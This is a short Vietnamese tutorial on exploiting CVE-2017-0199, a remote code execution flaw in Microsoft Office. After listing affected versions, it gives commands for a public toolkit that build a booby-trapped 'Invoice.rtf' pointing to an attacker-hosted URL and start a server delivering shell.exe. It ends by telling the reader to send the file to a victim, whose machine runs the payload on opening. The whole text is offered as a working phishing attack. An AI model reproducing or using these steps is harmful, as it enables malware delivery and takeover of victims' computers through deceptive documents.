Khai thác lỗ hổng HTA (CVE-2017-0199) trong Microsoft Office

Trong những ngày trung tuần tháng 4, một trong ba lỗ hổng ảnh hướng tới gần như tất cả các phiên bản của microsoft office word đã được công bố. Lỗi hổng này đã được gán tới cơ sở dữ liệu lỗ hổng là CVE-2017-0199. Lỗ hổng này cho phép kẻ xấu thực hiện bất kỳ một remote code nào thông qua một file văn bản độc hại. Các phiên bản bị ảnh hương bao gồm "Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1".

Bài viết này mình sẽ hướng dẫn các bạn cách khai thác lỗ hổng này.
  1. Tải công cụ khai thác tại đây.
  2. Tạo ra một file văn bản với lệnh
    python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
  3. Bật sever listener khai thác với lệnh
    python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
  • Gửi file văn bản đã được tạo ra ở bước 2. Nếu nạn nhân mở file này, khai thác sẽ được thực thi
DEMO